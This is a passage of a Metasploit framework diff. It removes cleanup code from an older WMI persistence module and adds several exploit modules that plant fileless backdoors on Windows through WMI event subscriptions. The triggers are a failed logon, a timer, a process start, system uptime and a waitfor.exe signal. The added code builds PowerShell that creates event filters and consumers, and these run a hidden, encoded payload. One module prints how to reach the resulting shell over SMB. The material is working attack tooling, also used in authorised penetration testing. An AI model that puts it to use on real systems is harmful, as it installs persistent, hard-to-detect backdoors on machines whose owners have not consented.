::FileUtils.mkdir_p(logs) - logfile = ::File.join(logs, Rex::FileUtils.clean_path(host + filenameinfo) + '.rc') - end - - def remove_persistence - name_class = datastore['CLASSNAME'] - clean_rc = log_file - if datastore['PERSISTENCE_METHOD'] == "WAITFOR" - clean_up_rc = "" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"Telemetrics\\\" DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"Telemetrics\\\" DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"Telemetrics\\\"' DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\"" - else - clean_up_rc = "" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" - clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\"" - end - file_local_write(clean_rc, clean_up_rc) - print_status("Clean up Meterpreter RC file: #{clean_rc}") - end -end diff --git a/modules/exploits/windows/persistence/wmi/wmi_event_subscription_event_log.rb b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_event_log.rb new file mode 100644 index 0000000000000..93e7ca8d6207b --- /dev/null +++ b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_event_log.rb @@ -0,0 +1,129 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = NormalRanking + + include Msf::Post::Windows::Powershell + include Msf::Exploit::Powershell + include Post::Windows::Priv + include Msf::Post::File + include Msf::Exploit::Local::Persistence + include Msf::Exploit::Deprecated + moved_from 'exploits/windows/local/wmi_persistence' + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'WMI Event Subscription Event Log Persistence', + 'Description' => %q{ + This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter + that will query the event log for an EVENT_ID_TRIGGER + (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing + must be enabled on the target for this method to work, this can be enabled using "auditpol.exe /set /subcategory:Logon + /failure:Enable"). When these criteria are met a command line event consumer will trigger an encoded powershell payload. + + Additionally a custom command can be specified to run once the trigger is + activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a + high integrity process. It is also recommended to use staged payloads due to powershell script length limitations. + }, + 'Author' => [ + 'Nick Tyrer <@NickTyrer>', # original module + 'h00die' # docs, persistence mixin, pshell cleanup + ], + 'License' => MSF_LICENSE, + 'Privileged' => true, + 'Platform' => 'win', + 'SessionTypes' => ['meterpreter'], + 'Targets' => [['Windows', {}]], + 'DisclosureDate' => '2017-06-06', + 'DefaultTarget' => 0, + 'References' => [ + ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'], + ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/'], + ['ATT&CK', Mitre::Attack::Technique::T1546_003_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION] + ], + 'Notes' => { + 'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION], + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] + } + ) + ) + + register_options([ + OptInt.new('EVENT_ID_TRIGGER', + [true, 'Event ID to trigger the payload. (Default: 4625)', 4625]), + OptString.new('USERNAME_TRIGGER', + [true, 'The username to trigger the payload. (Default: BOB)', 'BOB' ]), + OptString.new('CLASSNAME', + [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ]) + ]) + + register_advanced_options( + [ + OptString.new('CUSTOM_PS_COMMAND', + [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be enclosed in quotes)', false, ]), + ] + ) + end + + def check + print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value + return CheckCode::Safe('This module requires powershell to run') unless have_powershell? + + return CheckCode::Safe('This module requires admin privs to run') unless is_admin? + + return CheckCode::Safe('This module cannot run as System') if is_system? + + return CheckCode::Safe('This module requires UAC to be bypassed first') unless is_high_integrity? + + CheckCode::Appears('Likely exploitable') + end + + def install_persistence + host = session.session_host + print_status('Installing Persistence...') + + psh_exec(subscription_event) + print_good "Persistence installed! Call a shell using \"smbclient \\\\\\\\#{host}\\\\C$ -U #{datastore['USERNAME_TRIGGER']} \"" + print_good ' or' + print_good 'use auxiliary/scanner/smb/smb_login' + print_good " run SMBUser=#{datastore['USERNAME_TRIGGER']} SMBPass= RHOSTS=#{host}" + # wmic will be removed Windows 11, version 25H2 or Windows 11, version 24H2 in favor of powershell + # source https://support.microsoft.com/en-us/topic/windows-management-instrumentation-command-line-wmic-removal-from-windows-e9e83c7f-4992-477f-ba1d-96f694b8665d + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\"" + name_class = datastore['CLASSNAME'] + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __EventFilter WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM CommandLineEventConsumer WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"'\\\" | ForEach-Object { $_.Delete() }\"\n" + end + + def build_payload + if datastore['CUSTOM_PS_COMMAND'] + script_in = datastore['CUSTOM_PS_COMMAND'] + compressed_script = compress_script(script_in) + encoded_script = encode_script(compressed_script) + generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script) + else + cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) + end + end + + def subscription_event + command = build_payload + event_id = datastore['EVENT_ID_TRIGGER'] + username = datastore['USERNAME_TRIGGER'] + class_name = datastore['CLASSNAME'] + <<-HEREDOC + $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_NTLogEvent' AND Targetinstance.EventCode = '#{event_id}' And Targetinstance.Message Like '%#{username}%'\"; QueryLanguage = 'WQL'} + $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"} + $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} + HEREDOC + end +end diff --git a/modules/exploits/windows/persistence/wmi/wmi_event_subscription_interval.rb b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_interval.rb new file mode 100644 index 0000000000000..a09ec2604efc6 --- /dev/null +++ b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_interval.rb @@ -0,0 +1,135 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = NormalRanking + + include Msf::Post::Windows::Powershell + include Msf::Exploit::Powershell + include Post::Windows::Priv + include Msf::Post::File + include Msf::Exploit::Local::Persistence + include Msf::Exploit::Deprecated + moved_from 'exploits/windows/local/wmi_persistence' + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'WMI Event Subscription Interval Persistence', + 'Description' => %q{ + This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter + that triggers the payload after the specified CALLBACK_INTERVAL. + + If the persistence is not installed, it will keep triggering payloads to spawn. + + Additionally a custom command can be specified to run once the trigger is + activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a + high integrity process. It is also recommended to use staged payloads due to powershell script length limitations. + }, + 'Author' => [ + 'Nick Tyrer <@NickTyrer>', # original module + 'h00die' # docs, persistence mixin, pshell cleanup + ], + 'License' => MSF_LICENSE, + 'Privileged' => true, + 'Platform' => 'win', + 'SessionTypes' => ['meterpreter'], + 'Targets' => [['Windows', {}]], + 'DisclosureDate' => '2017-06-06', + 'DefaultTarget' => 0, + 'References' => [ + ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'], + ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/'], + ['ATT&CK', Mitre::Attack::Technique::T1546_003_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION] + ], + 'Notes' => { + 'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION], + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] + } + ) + ) + + register_options([ + OptInt.new('CALLBACK_INTERVAL', + [true, 'Time between callbacks (In milliseconds). (Default: 1800000).', 1_800_000 ]), # 30 minutes + OptString.new('CLASSNAME', + [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ]) + ]) + + register_advanced_options( + [ + OptString.new('CUSTOM_PS_COMMAND', + [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be enclosed in quotes)', false, ]), + ] + ) + end + + def check + print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value + return CheckCode::Safe('This module requires powershell to run') unless have_powershell? + + return CheckCode::Safe('This module requires admin privs to run') unless is_admin? + + return CheckCode::Safe('This module cannot run as System') if is_system? + + return CheckCode::Safe('This module requires UAC to be bypassed first') unless is_high_integrity? + + CheckCode::Appears('Likely exploitable') + end + + def format_duration(ms) + total_seconds = ms / 1000 + hours = total_seconds / 3600 + minutes = (total_seconds % 3600) / 60 + seconds = total_seconds % 60 + + parts = [] + parts << "#{hours}h" if hours > 0 + parts << "#{minutes}m" if minutes > 0 + parts << "#{seconds}s" if seconds > 0 || parts.empty? + + parts.join(' ') + end + + def install_persistence + print_status('Installing Persistence...') + psh_exec(subscription_interval) + print_good "Persistence installed! Callback should be in: #{format_duration(datastore['CALLBACK_INTERVAL'])}" + # wmic will be removed Windows 11, version 25H2 or Windows 11, version 24H2 in favor of powershell + # source https://support.microsoft.com/en-us/topic/windows-management-instrumentation-command-line-wmic-removal-from-windows-e9e83c7f-4992-477f-ba1d-96f694b8665d + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\"" + name_class = datastore['CLASSNAME'] + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __EventFilter WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM CommandLineEventConsumer WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"'\\\" | ForEach-Object { $_.Delete() }\"\n" + end + + def build_payload + if datastore['CUSTOM_PS_COMMAND'] + script_in = datastore['CUSTOM_PS_COMMAND'] + compressed_script = compress_script(script_in) + encoded_script = encode_script(compressed_script) + generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script) + else + cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) + end + end + + def subscription_interval + command = build_payload + class_name = datastore['CLASSNAME'] + callback_interval = datastore['CALLBACK_INTERVAL'] + <<-HEREDOC + $timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments @{ IntervalBetweenEvents = ([UInt32] #{callback_interval}); SkipIfPassed = $false; TimerID = \"Trigger\"} + $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"Select * FROM __TimerEvent WHERE TimerID = 'trigger'\"; QueryLanguage = 'WQL'} + $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"} + $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} + HEREDOC + end +end diff --git a/modules/exploits/windows/persistence/wmi/wmi_event_subscription_process.rb b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_process.rb new file mode 100644 index 0000000000000..a6f52f2adbb6c --- /dev/null +++ b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_process.rb @@ -0,0 +1,117 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = NormalRanking + + include Msf::Post::Windows::Powershell + include Msf::Exploit::Powershell + include Post::Windows::Priv + include Msf::Post::File + include Msf::Exploit::Local::Persistence + include Msf::Exploit::Deprecated + moved_from 'exploits/windows/local/wmi_persistence' + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'WMI Event Subscription Process Persistence', + 'Description' => %q{ + This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter + that triggers the payload when the specified process is started. + + Additionally a custom command can be specified to run once the trigger is + activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a + high integrity process. It is also recommended to use staged payloads due to powershell script length limitations. + }, + 'Author' => [ + 'Nick Tyrer <@NickTyrer>', # original module + 'h00die' # docs, persistence mixin, pshell cleanup + ], + 'License' => MSF_LICENSE, + 'Privileged' => true, + 'Platform' => 'win', + 'SessionTypes' => ['meterpreter'], + 'Targets' => [['Windows', {}]], + 'DisclosureDate' => '2017-06-06', + 'DefaultTarget' => 0, + 'References' => [ + ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'], + ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/'], + ['ATT&CK', Mitre::Attack::Technique::T1546_003_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION] + ], + 'Notes' => { + 'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION], + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] + } + ) + ) + + register_options([ + OptString.new('PROCESS_TRIGGER', + [true, 'The process name to trigger the payload. (Default: CALC.EXE)', 'CALC.EXE' ]), + OptString.new('CLASSNAME', + [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ]) + ]) + + register_advanced_options( + [ + OptString.new('CUSTOM_PS_COMMAND', + [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be enclosed in quotes)', false, ]), + ] + ) + end + + def check + print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value + return CheckCode::Safe('This module requires powershell to run') unless have_powershell? + + return CheckCode::Safe('This module requires admin privs to run') unless is_admin? + + return CheckCode::Safe('This module cannot run as System') if is_system? + + return CheckCode::Safe('This module requires UAC to be bypassed first') unless is_high_integrity? + + CheckCode::Appears('Likely exploitable') + end + + def install_persistence + psh_exec(subscription_process) + print_good 'Persistence installed!' + # wmic will be removed Windows 11, version 25H2 or Windows 11, version 24H2 in favor of powershell + # source https://support.microsoft.com/en-us/topic/windows-management-instrumentation-command-line-wmic-removal-from-windows-e9e83c7f-4992-477f-ba1d-96f694b8665d + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\"" + name_class = datastore['CLASSNAME'] + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __EventFilter WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM CommandLineEventConsumer WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"'\\\" | ForEach-Object { $_.Delete() }\"\n" + end + + def build_payload + if datastore['CUSTOM_PS_COMMAND'] + script_in = datastore['CUSTOM_PS_COMMAND'] + compressed_script = compress_script(script_in) + encoded_script = encode_script(compressed_script) + generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script) + else + cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) + end + end + + def subscription_process + command = build_payload + class_name = datastore['CLASSNAME'] + process_name = datastore['PROCESS_TRIGGER'] + <<-HEREDOC + $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName= '#{process_name}'\"; QueryLanguage = 'WQL'} + $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"} + $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} + HEREDOC + end +end diff --git a/modules/exploits/windows/persistence/wmi/wmi_event_subscription_uptime.rb b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_uptime.rb new file mode 100644 index 0000000000000..c5a78a1fba847 --- /dev/null +++ b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_uptime.rb @@ -0,0 +1,152 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = NormalRanking + + include Msf::Post::Windows::Powershell + include Msf::Exploit::Powershell + include Post::Windows::Priv + include Msf::Post::File + include Msf::Exploit::Local::Persistence + include Msf::Exploit::Deprecated + moved_from 'exploits/windows/local/wmi_persistence' + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'WMI Event Subscription Logon Timer Persistence', + 'Description' => %q{ + This module will create a permanent WMI event subscription to achieve file-less persistence using event filter that + will trigger the payload after the system has a certain uptime. Payloads will trigger every minute until the set end time. + + Additionally a custom command can be specified to run once the trigger is + activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a + high integrity process. It is also recommended to use staged payloads due to powershell script length limitations. + }, + 'Author' => [ + 'Nick Tyrer <@NickTyrer>', # original module + 'h00die' # docs, persistence mixin, pshell cleanup + ], + 'License' => MSF_LICENSE, + 'Privileged' => true, + 'Platform' => 'win', + 'SessionTypes' => ['meterpreter'], + 'Targets' => [['Windows', {}]], + 'DisclosureDate' => '2017-06-06', + 'DefaultTarget' => 0, + 'References' => [ + ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'], + ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/'], + ['ATT&CK', Mitre::Attack::Technique::T1546_003_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION] + ], + 'Notes' => { + 'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION], + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] + } + ) + ) + + register_options([ + OptString.new('CLASSNAME', + [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ]), + OptInt.new('SYSTEM_UPTIME_START', [true, 'System uptime to start the trigger (In seconds). (Default: 240).', 240 ]), # 4min + OptInt.new('SYSTEM_UPTIME_END', [true, 'System uptime to end the trigger (In seconds). (Default: 325).', 325 ]), # 5min 25sec + ]) + + register_advanced_options( + [ + OptString.new('CUSTOM_PS_COMMAND', + [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be enclosed in quotes)', false, ]), + ] + ) + end + + def check + print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value + return CheckCode::Safe('This module requires powershell to run') unless have_powershell? + + return CheckCode::Safe('This module requires admin privs to run') unless is_admin? + + return CheckCode::Safe('This module cannot run as System') if is_system? + + return CheckCode::Safe('This module requires UAC to be bypassed first') unless is_high_integrity? + + uptime = windows_uptime + vprint_status("System uptime: #{uptime}s") + return CheckCode::Safe("SYSTEM_UPTIME_START (#{datastore['SYSTEM_UPTIME_START']}) is less than the current system uptime: #{uptime}") if uptime > datastore['SYSTEM_UPTIME_START'] + return CheckCode::Safe("SYSTEM_UPTIME_START (#{datastore['SYSTEM_UPTIME_START']}) must be less than SYSTEM_UPTIME_END: #{datastore['SYSTEM_UPTIME_END']}") if datastore['SYSTEM_UPTIME_START'] > datastore['SYSTEM_UPTIME_END'] + + CheckCode::Appears('Likely exploitable') + end + + def windows_uptime + # Run PowerShell to get boot time in WMI format + boot_time_str = cmd_exec('powershell -Command "(gcim Win32_OperatingSystem).LastBootUpTime | Out-String"').strip + + # Try to parse PowerShell localized format (e.g. "Thursday, November 20, 2025 7:45:59 PM") + begin + boot_time = Time.parse(boot_time_str) + rescue ArgumentError + # Fallback: try WMI format like "20251120194559.500000-300" + if boot_time_str =~ /^(\d{4})(\d{2})(\d{2})(\d{2})(\d{2})(\d{2})\.\d+\s*([+-]\d{3})?/ + year = ::Regexp.last_match(1) + month = ::Regexp.last_match(2) + day = ::Regexp.last_match(3) + hour = ::Regexp.last_match(4) + min = ::Regexp.last_match(5) + sec = ::Regexp.last_match(6) + tz_offset = ::Regexp.last_match(7) + offset_hours = (tz_offset.to_i / 60) + offset = format('%+03d:00', offset_hours) + boot_time = Time.new(year, month, day, hour, min, sec, offset) + else + vprint_error("Unable to parse boot time: #{boot_time_str.inspect}") + return 0 + end + end + + (Time.now - boot_time).round + end + + def install_persistence + print_status('Installing Persistence...') + + psh_exec(subscription_logon) + print_good 'Persistence installed!' + # wmic will be removed Windows 11, version 25H2 or Windows 11, version 24H2 in favor of powershell + # source https://support.microsoft.com/en-us/topic/windows-management-instrumentation-command-line-wmic-removal-from-windows-e9e83c7f-4992-477f-ba1d-96f694b8665d + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n" + # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\"" + name_class = datastore['CLASSNAME'] + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __EventFilter WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM CommandLineEventConsumer WHERE Name='#{name_class}'\\\" | ForEach-Object { $_.Delete() }\"\n" + @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"'\\\" | ForEach-Object { $_.Delete() }\"\n" + end + + def build_payload + if datastore['CUSTOM_PS_COMMAND'] + script_in = datastore['CUSTOM_PS_COMMAND'] + compressed_script = compress_script(script_in) + encoded_script = encode_script(compressed_script) + generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script) + else + cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) + end + end + + def subscription_logon + command = build_payload + class_name = datastore['CLASSNAME'] + <<-HEREDOC + $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= #{datastore['SYSTEM_UPTIME_START']} AND TargetInstance.SystemUpTime < #{datastore['SYSTEM_UPTIME_END']}\"; QueryLanguage = 'WQL'} + $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"} + $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} + HEREDOC + end +end diff --git a/modules/exploits/windows/persistence/wmi/wmi_event_subscription_waitfor.rb b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_waitfor.rb new file mode 100644 index 0000000000000..629276c077730 --- /dev/null +++ b/modules/exploits/windows/persistence/wmi/wmi_event_subscription_waitfor.rb @@ -0,0 +1,131 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = NormalRanking + + include Msf::Post::Windows::Powershell + include Msf::Exploit::Powershell + include Post::Windows::Priv + include Msf::Post::File + include Msf::Exploit::Local::Persistence + include Msf::Exploit::Deprecated + moved_from 'exploits/windows/local/wmi_persistence' + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'WMI Event Subscription Waitfor Persistence', + 'Description' => %q{ + This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter that utilizes + the Microsoft binary waitfor.exe to wait for a signal specified + by WAITFOR_TRIGGER before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command + (note: requires target to have port 445 open). + + Additionally a custom command can be specified to run once the 